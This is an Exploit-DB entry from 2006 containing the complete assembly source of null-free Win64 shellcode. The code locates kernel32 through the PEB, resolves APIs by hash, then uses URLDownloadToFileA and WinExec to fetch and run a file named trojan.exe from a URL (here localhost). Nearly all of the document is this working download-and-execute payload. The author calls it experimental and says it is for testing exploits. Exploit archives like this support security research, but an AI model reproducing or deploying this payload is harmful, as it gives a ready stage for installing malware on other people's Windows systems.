win64 URLDownloadToFileA download and execute 218+ bytes

2006-08-07T00:00:00
ID EDB-ID:13533
Type exploitdb
Reporter Weiss
Modified 2006-08-07T00:00:00

Description

win64 (URLDownloadToFileA) download and execute 218+ bytes. Shellcode exploit for win64 platform

                                        
                                            ;
; dexec64.asm - 218+ bytes (unoptimised)
;
; Win64 asm code, download & execute file using URLDownloadToFileA moniker & WinExec
;
; tested on AMD64 running Windows x64 SP1
;
; there probably are errors in the code, but this is more of an experimental source if nothing else.
; send corrections or errors to: 'weiss' wyse101 [at] gmail [dot] com
; code is not optimised at all, doesn't contain null bytes, so is possibly suitable for testing exploits on win64
;
; one of the main stumbling blocks in coding x64 asm on windows is the alignment of the stack.
; it must be aligned by 16 bytes because windows uses 128-bit SSE2, otherwise the api call will fail.
;
; thanx:
;
; roy g biv/29a - http://www.29a.net/
; Feryno - http://feryno.host.sk
; Tomasz Grysztar - http://flatassembler.org
;
format PE64 console 4.0
entry entrypoint

section '.text' code readable writeable executable     ; assumed to be writeable when in memory, no NX obstruction!

                                           ; 1*8 is used rather than 0*8 because it uses null byte
LoadLibraryA         equ  rbp+1*8          ; using rbp is smaller than using ebp on 64-bit
WinExec              equ  rbp+2*8
URLDownloadToFileA   equ  rbp+3*8          ; must be rbp because of 64-bit URLMON base address

entrypoint:
   jmp get_eip
load_dta:
   pop  rax
   push rax
   lea  r15,[rax-(setup_stack-hashes)]
   inc  byte [rax-(setup_stack-url_end)]          ; nullify tail end of url
   inc  byte [rax-(setup_stack-fname_end)]        ; nullify end of filename
   inc  byte [rax-(setup_stack-url_mon_end)]      ; nullify end of URLMON
   ret                                            ; go!

hashes:
   dw  0bb86h         ; LoadLibraryA()     635bbb86
   dw  0a333h         ; WinExec()          208da333

   db  'URLMON',0ffh,0ffh
url_mon_end   =   $-2

   dw  05f92h         ; URLDownloadToFileA    c91e5f92
   dq  -1
fname:
   db  'trojan.exe',0ffh                        ; what to save as
fname_end  =   $-1

url:
   db  'http://localhost/trojan.exe',0ffh       ; where to download file from
url_end  =   $-1

get_eip:
   call  load_dta
setup_stack:
   add  rsp,-(4*8)    ; 3 api variables, + 1 for avoiding null :-|
   push  rsp
   pop  rbp           ; rbp = table of api
   mov  rdi,rbp       ; rdi points to table also
   stosq              ; doesn't really do anything.
   add  rsp,-(11*8)   ; reserve space for windows, when calling api

   push 60h           ; Hello, Ratter. 8-D
   pop rcx
   mov rax,[gs:rcx]   ; Peb
   mov rax,[rax+18h]  ; PebLdr
   mov rsi,[rax+30h]  ; Ldr.InInitializationOrderModuleList
   lodsq              ; skip ntdll.dll
   mov rbx,[rax+10h]  ; kernel32.dll base

   mov cl,2                     ; get 2 api first
get_apis_loop:
   mov  eax,dword[rbx+3ch]      ; MZ header size
   lea  rsi,[rbx+rax+78h]       ; export directory begins at 88h
   mov  eax,dword[rsi+10h]      ; extra instructions needed to avoid null bytes
   lea  rsi,[rbx+rax+1ch]

   lodsd
   lea  r9,[rax+rbx]
   lodsd
   lea  r10,[rax+rbx]
   lodsd
   lea  r11,[rax+rbx]
   xor  r12,r12
load_index:
   mov  esi,dword[r10+4*r12]
   add  rsi,rbx
   inc  r12
   xor  eax,eax
   cdq
hash_export:
   lodsb
   add  edx,eax
   rol  edx, 5
   dec  eax
   jns  hash_export
   ror  edx, 5
   cmp  dx,word [r15]            ; found api?
   jne  load_index

   movzx  edx,word [r11+2*r12-2]
   mov  eax,[r9+4*rdx]
   add  rax,rbx
   add  r15,2                  ; skip hash

   stosq                       ; save api address
   loop get_apis_loop

   push  r15                   ; push/pop to avoid null with mov
   pop  rcx
   call  qword[LoadLibraryA]

   xchg  rax,rbx
   add  r15,8                   ; skip URLMON, first time.
   push  1                      ; get 1 api from URLMON
   pop  rcx
   test  rbx,rbx                ; continue if not zero
   jne   get_apis_loop

   dec  ecx
   push  rbx
   sub  rsp,3*8                 ; needed to align stack
   xor  r9,r9
   mov  r8,r15
   lea  rdx,[r8+(url-fname)]
   call  qword[URLDownloadToFileA]

   push 1
   pop  rdx
   mov rcx,r15
   call  qword[WinExec]       ; WinExec("trojan.exe",SW_SHOWNORMAL??);

   ;jmp   $                   ; hang

   call qword[ExitProcess]    ; not required, testing only

; section below not required, simply for testing.
section '.idata' import data readable writeable

  dd 0,0,0,RVA kernel_name,RVA kernel_table
  dd 0,0,0,0,0

  kernel_table:
    ExitProcess dq RVA _ExitProcess
    dq 0

  kernel_name db 'KERNEL32.DLL',0

  _ExitProcess dw 0
    db 'ExitProcess',0

; July 2006 - (Ireland)

; milw0rm.com [2006-08-07]